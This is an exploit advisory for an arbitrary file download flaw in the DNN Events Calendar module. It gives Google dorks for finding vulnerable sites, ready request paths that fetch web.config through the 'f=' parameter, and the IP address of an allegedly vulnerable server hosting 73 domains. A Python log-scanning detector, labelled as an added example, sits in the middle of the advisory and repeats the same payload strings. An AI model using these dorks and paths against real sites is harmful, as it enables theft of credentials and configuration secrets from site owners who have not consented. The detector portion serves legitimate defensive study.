####################################################################
# Exploit Title : DNNSoftware EventsCalendar Modules 1.x Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : dnnsoftware.com
# Software Information Link : store.dnnsoftware.com/home/product-details/events-calendar
# Software Version : 1.x and All Versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Copyright 2019 by Associated Builders and Contractors''
inurl:''/desktopmodules/eventscalendar/''
# Vulnerability Type : CWE-16 [ Configuration ]
####################################################################
# Description :
*************
* Events Calendar is a calendar module for adding and displaying events, with the time and description entered in a rich text editor.
* DotNetNuke DNNSoftware Events Calendar Modules 1.x and other versions
are prone to a vulnerability that lets attackers download arbitrary files because
the application fails to sufficiently verify user-supplied input.
* This may allow an attacker to gain access to sensitive information, which may aid in launching further attacks.
* An attacker can download and read any file whose name is known via the '?f=' parameter.
# Arbitrary File Download Exploit :
*******************************
/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
/desktopmodules/eventscalendar/downloaddoc.aspx?f=[DOWNLOAD-ANY-FILE]
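Added example, not part of the original advisory: a check a site owner can run over IIS W3C logs to find requests to downloaddoc.aspx whose f= value is rooted, traverses directories, or names a non-document file. The log lines, the extension list and the function names are constructed for illustration.

```python
import posixpath
from urllib.parse import parse_qsl, unquote

HANDLER = "/desktopmodules/eventscalendar/downloaddoc.aspx"
# Assumption: legitimate event attachments are documents, never these types.
SENSITIVE_EXT = {".config", ".aspx", ".ascx", ".cs", ".vb", ".dll", ".mdf", ".bak"}

# Constructed IIS W3C log sample (documentation IP addresses).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2019-01-18 10:02:11 GET /DesktopModules/EventsCalendar/downloaddoc.aspx f=agenda.pdf 192.0.2.10 200
2019-01-18 10:05:42 GET /desktopmodules/eventscalendar/downloaddoc.aspx f=~/web.config 198.51.100.7 200
2019-01-18 10:05:50 GET /desktopmodules/eventscalendar/downloaddoc.aspx f=..%252f..%252fweb.config 198.51.100.7 404
2019-01-18 10:06:03 GET /default.aspx tabid=55 192.0.2.10 200
"""

def classify(value):
    """Return the reasons an f= value looks like a file-disclosure attempt."""
    for _ in range(3):  # decode repeatedly to catch double-encoded separators
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    path = value.replace("\\", "/").lower()
    reasons = []
    if path.startswith(("~", "/")) or ":" in path:
        reasons.append("rooted-path")
    if ".." in path.split("/"):
        reasons.append("traversal")
    if posixpath.splitext(path)[1] in SENSITIVE_EXT:
        reasons.append("sensitive-extension")
    return reasons

def scan(log_text):
    """Return (client ip, status, f value, reasons) for each suspicious request."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-uri-stem", "").lower() != HANDLER:
            continue
        for key, value in parse_qsl(row.get("cs-uri-query", "")):
            if key.lower() == "f" and (reasons := classify(value)):
                hits.append((row.get("c-ip"), row.get("sc-status"), value, reasons))
    return hits
```

A hit with status 200 means the file was most likely served, so any secrets in it (connection strings, machine keys) should be rotated.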
####################################################################
# Example Vulnerable Sites :
*************************
Note : (38.95.37.77) => There are 73 domains hosted on this server.
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################